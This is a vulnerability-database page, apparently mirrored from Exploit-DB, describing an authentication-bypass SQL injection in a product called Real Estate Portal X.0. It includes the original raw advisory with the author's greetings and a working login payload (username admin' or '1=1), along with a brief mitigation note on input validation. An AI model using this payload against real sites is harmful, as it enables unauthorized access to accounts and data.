header-logo
Suggest Exploit
vendor:
Real Estate Portal
by:
AnTi SeCuRe
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Real Estate Portal
Affected Version From: X.0
Affected Version To: X.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Real Estate Portal X.0 (Auth Bypass) Remote Sql Injection

An attacker can bypass authentication by using a SQL injection attack. By entering the username 'admin' or '1=1' and the password 'Anti', an attacker can gain access to the real estate portal without authentication.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user input should be validated and filtered before being used in a SQL query.
Source

Exploit-DB raw data:

###############################
Real Estate Portal X.0 (Auth Bypass) Remote Sql Injection
Author : AnTi SeCuRe
Email : AnTi-SeCuRe@HoTMaiL.CoM
TeaM : SauDi ViRuS TeaM
Site : WwW.VxX9.Cc
###############################

~ Note :Its Not Free .. Its By : $199.00
~ IF You Want To Buy It : http://www.netartmedia.net/en_Pricing.html

[~] Demo : http://www.site.com/realestate20/
[~] username: admin' or '1=1
[~] password: Anti


[~] Thanks To : Allah

~ Greets : RENO , Dr.php , Jetli007 , Gov.Hacker , ! BaD BoY ! , TeaM SauDi ViRuS , All Members Of vxx9.cc , Tryag.cc

Navigation

Suggest Exploit

Services By CQR